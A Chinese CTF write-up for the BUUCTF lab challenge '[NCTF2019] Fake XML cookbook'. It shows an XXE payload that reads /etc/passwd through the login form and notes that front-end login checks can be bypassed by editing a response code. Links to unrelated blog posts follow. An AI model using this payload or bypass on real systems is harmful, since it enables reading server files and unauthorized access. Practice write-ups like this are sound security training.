[NCTF2019]Fake XML cookbook

BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[NCTF2019]Fake%20XML%20cookbook启动靶机,一个登录页面

试了一下弱口令和万能密码,不行.

查看一下源码,发现可能存在xxe(xml外部实体注入)

抓包,尝试一下常见payload,传递一个外部实体DTD看看会不会被执行

复制代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
    <!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user>
    <username>&admin;</username>
    <password>root</password>
</user>

说明漏洞确实存在,修改一下payload,可以读取到flag{402098c9-0fd9-4c60-8ecd-5683c3931ccd}

=====================

题外话,在看代码的时候,发现code==0 表示登陆失败,code==1 表示登录成功。

某些时候,修改code的值,会自动跳转进入内部页面,从而达到登录绕过。

这种是通过前端来校验用户登录的,很弱,一般还是比较少见的

相关推荐
ruleslol7 小时前
五分钟XML速成
xml
令狐少侠20111 天前
maven settings.xml文件的各个模块、含义以及它们之间的联系
xml·maven
l1t1 天前
张泽鹏先生手搓的纯ANSI处理UTF-8与美团龙猫调用expat库读取Excel xml对比测试
xml·人工智能·excel·utf8·expat
charlie1145141912 天前
Android开发——初步了解AndroidManifest.xml
android·xml·开发语言·学习·安卓·安全架构
热烈勒温2 天前
Mybatis入门、操作数据、配置xml映射、数据封装
xml·mybatis
微笑伴你而行2 天前
目标检测如何将同时有方形框和旋转框的json/xml标注转为txt格式
xml·目标检测·json
fatiaozhang95273 天前
数码视讯TR100-OTT-G1_国科GK6323_安卓9_广东联通原机修改-TTL烧录包-可救砖
android·xml·电视盒子·刷机固件·机顶盒刷机
l1t3 天前
美团龙猫利用expat库实现的保存xml指定范围数据到csv的C程序
xml·c语言·解析器·expat
l1t4 天前
DuckDB新版rusty_sheet 插件测试
xml·数据库·rust·插件·xlsx·duckdb